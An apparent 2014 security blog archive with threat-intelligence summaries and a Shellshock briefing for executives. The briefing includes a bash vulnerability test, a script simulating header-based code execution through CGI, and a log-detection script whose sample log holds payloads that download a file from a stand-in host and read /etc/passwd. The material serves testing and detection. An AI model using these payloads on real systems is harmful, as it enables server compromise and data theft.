Malware has been discovered targeting the protesters in Hong Kong whose demonstrations began this week. This is a very targeted and rapid attack, an attempt to monitor the protesters and perhaps arrest those sympathetic to their cause.

ANALYSIS:

The malware, dubbed “Xsser mRAT”, was attributed to China and is unusual in that it targets not only Android phones but iOS (Apple) phones as well, though the iOS variant only runs on jailbroken devices and at this time no working version has been seen in the wild. Once installed, this cross-platform malware can see and capture everything the user does on the phone.

Code within the malware contains Chinese-language strings and reports back to a command and control server under Chinese control. This is just another escalation in the ongoing battle over protests for a freer Hong Kong, something China does not necessarily want.

The incident serves as an example of how advanced persistent threats can take weaponized code they already hold and rapidly deploy it against those they wish to attack.

http://www.nbcnews.com/storyline/hong-kong-protests/hong-kong-protesters-phones-targeted-chinese-malware-experts-say-n215396

Putting TRANSCOM in Perspective

Today, the Senate Armed Services Committee released information indicating that China-based threat actors were heavily targeting TRANSCOM, the U.S. military’s logistics arm. In terms of the private sector contractors impacted, the intrusions detailed in the Levin report mirror activity FireEye has observed: we frequently see nation state threat actors target not only government, but also private sector organizations in order to obtain military intelligence.

ANALYSIS:

FireEye put out a blog post after the Senate Armed Services Committee released its report on attacks carried out by APT actors against defense industrial base companies. This is not necessarily news, but the fact remains that the defense industrial base is not the only target of nation state actors of late.

While APTs (Advanced Persistent Threats) are prevalent, it is important to know that they target anything and everything that may be of interest to them. This means that public systems as well as corporations are now potential targets. As such, every company should take the time to understand what this means, how these actors carry out their attacks, and how to protect against them.

http://www.fireeye.com/blog/technical/2014/09/putting-transcom-in-perspective.html

I have also created a word format of this document with a section where you can put in your own metrics. Use this document to give your executives a threat intelligence report and hopefully enlighten them on what is going on out there.

LINK TO WORD FORMAT OF THIS DOCUMENT: HERE

Written by Krypt3ia

2014/10/01 at 20:28

Posted in Uncategorized

SHELLSHOCK!

leave a comment »


Hey kids!

I just thought I would drop this stock email for you all to use to explain to your execs the problem of SHELLSHOCK and that it is IMPORTANT! I tried to wordsmith it for the exec set, and the links go right to pertinent blog posts and the CVE from NIST. Just a heads up: I just saw that F5 BIG-IP is also in fact vulnerable to this attack, so WHEEEEE!

Smoke em if you got em…

K.

UPDATE: Looks like a SUID attack may be possible too…


Email Text:

All,

There’s a new vulnerability (Shellshock, CVE-2014-6271) in bash that affects nearly every Internet-facing Linux/UNIX system. Bash parses specially formatted environment variables as function definitions and, because of the bug, keeps executing whatever follows the function body. Anything that lets an attacker set an environment variable, such as a web server exporting HTTP request headers to a CGI script, therefore lets the attacker run commands on the server. There is already a Metasploit module for this. You can check whether a system’s bash is vulnerable with the command below. This is an important vulnerability that could lead to larger compromise of our environment!

The short answer is that if you are vulnerable an attacker can execute arbitrary commands on the system, for example to read /etc/passwd or anything else the web server’s user can reach.

Needless to say this is of HIGH importance: NVD rates it CVSS 10.0, the maximum score!

https://bugzilla.redhat.com/show_bug.cgi?id=CVE-2014-6271

https://t.co/RprJoBGl7s

http://www.troyhunt.com/2014/09/everything-you-need-to-know-about.html?m=1

How to test for this vulnerability:

env X='() { :;}; echo busted' bash -c "echo stuff"

If you get "busted" back before "stuff", you are in fact vulnerable. Invoke bash explicitly, as above: on systems where /bin/sh is not bash (Debian and Ubuntu use dash), running /bin/sh -c would report clean even though the installed bash is vulnerable.
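As an added example (not part of the original post or the stock email), here is the check above wrapped in a function, plus a simulation of the CGI path that makes the bug remotely exploitable: a throwaway bash CGI script is run with a User-Agent header exported the way mod_cgi exports request headers, as HTTP_USER_AGENT. The CGI script, the marker strings (BUSTED, PWNED) and the header value are constructed for the demonstration, and the script assumes bash is somewhere on PATH. On a patched bash both functions return 1; only a vulnerable bash returns 0.

```shell
#!/bin/sh
# Added example: Shellshock (CVE-2014-6271) self-check plus a CGI-path simulation.
# Return codes for both functions: 0 = vulnerable, 1 = not vulnerable, 2 = no bash / no mktemp.

is_bash_vulnerable() {
    bash_bin=$(command -v bash) || return 2
    # A vulnerable bash parses the value of ANY environment variable that begins
    # with "() {" as a function definition and keeps executing past the closing
    # brace, so the trailing "echo BUSTED" runs while bash starts up.
    out=$(env X='() { :;}; echo BUSTED' "$bash_bin" -c 'echo ok' 2>/dev/null)
    case "$out" in
        *BUSTED*) return 0 ;;
        *)        return 1 ;;
    esac
}

# Simulates what mod_cgi does: request headers become HTTP_* environment
# variables and the CGI program is exec'd with them. $1 is the User-Agent
# value the "client" sent.
cgi_request() {
    bash_bin=$(command -v bash) || return 2
    script=$(mktemp) || return 2
    # Constructed, deliberately boring CGI script. The attacker never edits it;
    # the payload fires before its first line executes.
    cat >"$script" <<'EOF'
#!/bin/bash
echo "Content-Type: text/plain"
echo
echo "status: ok"
EOF
    out=$(env -i HTTP_USER_AGENT="$1" "$bash_bin" "$script" 2>/dev/null)
    rm -f "$script"
    case "$out" in
        *PWNED*) return 0 ;;   # the header payload ran on the server
        *)       return 1 ;;
    esac
}

# Constructed malicious header: an empty function body, then the real command.
EVIL_UA='() { :;}; echo PWNED'

main() {
    rc=0; is_bash_vulnerable || rc=$?
    case $rc in
        0) echo "local bash: VULNERABLE" ;;
        1) echo "local bash: patched" ;;
        *) echo "local bash: not found" ;;
    esac
    rc=0; cgi_request "$EVIL_UA" || rc=$?
    case $rc in
        0) echo "CGI with hostile User-Agent: command executed on server" ;;
        1) echo "CGI with hostile User-Agent: payload ignored" ;;
        *) echo "CGI simulation: could not run (no bash or mktemp)" ;;
    esac
}

main
```

Running the script prints the two verdicts; to reproduce the original one-liner's behaviour on a host you suspect, only `is_bash_vulnerable` is needed. The `cgi_request` half is there to make the point to the exec set that the attacker needs nothing more than a request header: the CGI script itself is untouched.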

 

REMEDIATIONS:

https://access.redhat.com/solutions/1207723 Red Hat recommendations


Another concern: other appliances and devices that are at risk and cannot simply be patched.

The bigger worry is the devices with no easy patching path, for example your router. Short of checking in with the manufacturer’s website for updated firmware, this is going to be a really hard nut to crack. Often routers provided by ISPs are locked down so that consumers aren’t randomly changing either config or firmware and there’s not always a remote upgrade path they can trigger either. Combine that with the massive array of devices and ages that are out there and this could be particularly tricky. Of course it’s also not the sort of thing your average consumer is going to be comfortable doing themselves either. ~Troy Hunt

Another option is to replace bash with an alternate shell, bearing in mind that existing scripts may depend on bash-specific features:

“Other more drastic options include replacing Bash with an alternate shell implementation or cordoning off at-risk systems, both of which could have far-reaching ramifications and are unlikely to be decisions taken lightly. But that’s probably going to be the nature of this bug for many people – hard decisions that could have tangible business impact in order to avoid potentially much more significant ramifications.” ~Troy Hunt

 

DETECTION OF COMPROMISE:

There is no reliable way to detect exploitation after the fact unless you are capturing full packets or your web server logs the header the payload arrived in. Apache’s combined log format records User-Agent and Referer, two of the most common injection points, so grepping access logs for the "() {" prefix will catch the noisy scanners; payloads carried in Cookie, Host or custom headers, or in a POST body, are normally not logged at all.

This can be hard to determine if there’s no logging of the attack vectors (there often won’t be if it’s passed by HTTP request header or POST body), but it’s more likely to be caught than with Heartbleed when short of full on pcaps, the heartbeat payloads would not normally have been logged anywhere. ~Troy Hunt
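Log detection, as an added example that is not part of the original post: a fixed-string search for the "() {" prefix that the vulnerable parser required, run over a constructed Apache combined-format access log (made-up addresses, paths and payloads). It assumes the server logs User-Agent and Referer, i.e. the combined rather than the common format; a payload in a header that is not logged, or in a POST body, leaves nothing for this to find, which is exactly the limitation described above.

```shell
#!/bin/sh
# Added example: hunt for Shellshock probes in Apache "combined" access logs.
# The vulnerable bash only parsed a variable whose value began exactly with
# "() {", so that literal string is the most reliable signature for the
# original CVE-2014-6271 payloads, whatever command follows it.

# Constructed sample log (fake addresses, hosts and requests). Field order:
# client ident user [time] "request" status bytes "referer" "user-agent"
SAMPLE_ACCESS_LOG='198.51.100.7 - - [25/Sep/2014:08:12:01 +0000] "GET /index.html HTTP/1.1" 200 1024 "-" "Mozilla/5.0"
203.0.113.9 - - [25/Sep/2014:08:12:44 +0000] "GET /cgi-bin/status HTTP/1.1" 200 512 "-" "() { :;}; /usr/bin/wget -O /tmp/x http://203.0.113.9/x"
198.51.100.7 - - [25/Sep/2014:08:13:10 +0000] "GET /cgi-bin/status HTTP/1.1" 200 512 "() { :; }; echo; /bin/cat /etc/passwd" "curl/7.37.0"
192.0.2.15 - - [25/Sep/2014:08:14:02 +0000] "POST /login HTTP/1.1" 302 0 "-" "Mozilla/5.0 (Windows NT 6.1)"'

# Count lines carrying a Shellshock function prefix. Reads stdin, prints the count.
shellshock_hits() {
    grep -c -F '() {' || true     # grep exits 1 when the count is 0; keep going
}

# Print client, request line, referer and user-agent of each hit for triage.
# Splitting on the double quote keeps the payload intact even if it has spaces.
shellshock_triage() {
    grep -F '() {' | awk -F'"' '{ print $1 " " $2 " referer=" $4 " ua=" $6 }' || true
}

# Hosts that sent a payload at a /cgi-bin/ path AND got a 200 back deserve the
# first look: a 404 means the probe found nothing to execute.
shellshock_cgi_success_ips() {
    grep -F '() {' | grep -F '/cgi-bin/' | awk '$9 == 200 { print $1 }' | sort -u || true
}

# Demonstration on the constructed sample; for a real server feed the log in instead,
# e.g.  cat /var/log/apache2/access.log | shellshock_triage
printf '%s\n' "$SAMPLE_ACCESS_LOG" | shellshock_triage
printf 'hits: %s\n' "$(printf '%s\n' "$SAMPLE_ACCESS_LOG" | shellshock_hits)"
```

On the sample this reports two hits, one in the User-Agent field and one in the Referer, and both source addresses as candidates for follow-up because the CGI path answered 200. Treat a hit as a probe, not proof of compromise: the next step is checking that host for the outbound fetch or the new process the payload tried to start.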

The real problem here is that this exploit set is still being worked out because it is modular: once an attacker can get arbitrary commands to run, that command can fetch and execute any second-stage payload, including something nobody has a signature for yet. So this is an evolving threat and MUST be taken seriously. Mitigation strategies should be worked out in the environment and all due diligence should be followed in keeping up with the intelligence on this vulnerability and what is being seen in the wild.

Written by Krypt3ia

2014/09/25 at 11:14
